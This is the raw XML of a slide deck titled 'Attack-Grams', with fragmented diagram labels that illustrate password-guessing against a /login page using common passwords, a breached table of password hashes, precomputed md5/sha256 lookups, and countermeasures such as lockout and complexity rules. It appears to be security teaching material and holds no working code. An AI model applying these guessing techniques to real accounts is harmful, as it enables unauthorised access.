            <a:avLst>
              <a:gd name="adj" fmla="val 25000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:alpha val="18000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="4472c4">
                <a:shade val="50000"/>
                <a:alpha val="2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3" name="TextBox 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3831120" y="1313280"/>
            <a:ext cx="1270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Database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54" name="Table 12"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3306960" y="2024640"/>
          <a:ext cx="2423520" cy="1462320"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="576000"/>
                <a:gridCol w="839160"/>
                <a:gridCol w="1008000"/>
              </a:tblGrid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id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username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passhash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5163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5164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eve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c00000"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                        </a:rPr>
                        <a:t>E9A92A2…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5165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pic>
        <p:nvPicPr>
          <p:cNvPr id="155" name="Graphic 23" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5454720" y="4182840"/>
            <a:ext cx="952200" cy="952200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="156" name="TextBox 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5354280" y="5106960"/>
            <a:ext cx="1136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TextBox 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4482720" y="3754440"/>
            <a:ext cx="1583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Data breach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8" name="Curved Connector 17"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="16200000">
            <a:off x="4805640" y="3010320"/>
            <a:ext cx="1523160" cy="727920"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25011"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="c00000"/>
            </a:solidFill>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="159" name="Table 31"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6518160" y="3667680"/>
          <a:ext cx="2744640" cy="1279800"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="933120"/>
                <a:gridCol w="669600"/>
                <a:gridCol w="1141920"/>
              </a:tblGrid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value</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="12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md5</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="12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sha256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ABCDEFG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BB74…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c00000"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                        </a:rPr>
                        <a:t>E9A92A2…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200" spc="-1" strike="noStrike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60" name="TextBox 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6602400" y="3298320"/>
            <a:ext cx="2575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Precomputed hashes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807920" y="34632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Password Guessing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2" name="Picture 3" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:srcRect l="80808" t="32963" r="2090" b="37635"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4958280" y="1690560"/>
            <a:ext cx="718200" cy="872640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="163" name="TextBox 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4848480" y="2563560"/>
            <a:ext cx="815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/login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Graphic 5" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2210400" y="1650960"/>
            <a:ext cx="952200" cy="952200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="165" name="TextBox 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2109960" y="2575080"/>
            <a:ext cx="1136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Attacker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66" name="Table 8"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="707760" y="1690560"/>
          <a:ext cx="1302480" cy="1371600"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1302480"/>
              </a:tblGrid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123456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password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c00000"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                        </a:rPr>
                        <a:t>ABCDEFG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6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67" name="TextBox 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="658440" y="3133440"/>
            <a:ext cx="1366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Common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Passwords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68" name="Straight Connector 11"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2565720" y="2896200"/>
            <a:ext cx="9360" cy="3611160"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="34925">
            <a:solidFill>
              <a:srgbClr val="a5a5a5"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="169" name="Straight Connector 12"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5213880" y="2898720"/>
            <a:ext cx="360" cy="3552480"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="34925">
            <a:solidFill>
              <a:srgbClr val="a5a5a5"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="170" name="Picture 16" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="41000"/>
          </a:blip>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="181200">
            <a:off x="5909760" y="1653120"/>
            <a:ext cx="2015640" cy="2205360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="171" name="TextBox 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5986440" y="3855600"/>
            <a:ext cx="1979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Password Policy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Box 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6539760" y="1787400"/>
            <a:ext cx="8730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sngStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Lockout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Box 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6471360" y="2095920"/>
            <a:ext cx="11883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sngStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Complexity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4" name="Straight Arrow Connector 21"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2574720" y="3278160"/>
            <a:ext cx="2630880" cy="360"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="31750">
            <a:solidFill>
              <a:srgbClr val="c00000"/>
            </a:solidFill>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="175" name="TextBox 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3543840" y="2948760"/>
            <a:ext cx="1747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Try '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123456'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6" name="Straight Arrow Connector 24"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2566440" y="3292560"/>
            <a:ext cx="2647800" cy="853920"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="31750">
            <a:solidFill>
              <a:srgbClr val="4472c4"/>
            </a:solidFill>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="177" name="TextBox 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20570400">
            <a:off x="2320200" y="3561840"/>
            <a:ext cx="2189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Invalid password!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8" name="Straight Arrow Connector 28"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2567160" y="4171320"/>
            <a:ext cx="2647080" cy="360"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="31750">
            <a:solidFill>
              <a:srgbClr val="c00000"/>
            </a:solidFill>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="179" name="TextBox 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3405600" y="3843000"/>
            <a:ext cx="1968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Try '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password'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0" name="Straight Arrow Connector 30"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2565720" y="4202280"/>
            <a:ext cx="2639880" cy="868320"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="31750">
            <a:solidFill>
              <a:srgbClr val="4472c4"/>
            </a:solidFill>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="181" name="TextBox 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20563200">
            <a:off x="2319840" y="4464000"/>
            <a:ext cx="2189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Invalid password!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TextBox 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3761280" y="4650120"/>
            <a:ext cx="408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3" name="Straight Arrow Connector 33"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2583360" y="5495760"/>
            <a:ext cx="2630880" cy="360"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="31750">
            <a:solidFill>
              <a:srgbClr val="c00000"/>
            </a:solidFill>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="184" name="TextBox 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3364920" y="5195160"/>
            <a:ext cx="1982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Try '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ABCDEFG'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5" name="Straight Arrow Connector 37"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2565720" y="5541480"/>
            <a:ext cx="2639880" cy="768240"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="31750">
            <a:solidFill>
              <a:srgbClr val="70ad47"/>
            </a:solidFill>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="186" name="TextBox 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20638200">
            <a:off x="2335320" y="5740560"/>
            <a:ext cx="2185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Login authorized!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20657</TotalTime>
  <Application>LibreOffice/7.5.7.1$Linux_X86_64 LibreOffice_project/50$Build-1</Application>
  <AppVersion>15.0000</AppVersion>
  <Words>503</Words>
  <Paragraphs>206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2019-01-08T18:07:44Z</dcterms:created>
  <dc:creator>Paul Ionescu</dc:creator>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-25T19:11:56Z</dcterms:modified>
  <cp:revision>82</cp:revision>
  <dc:subject/>
  <dc:title>Attack-Grams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Widescreen</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="Slides">
    <vt:i4>22</vt:i4>
  </property>
</Properties>
</file>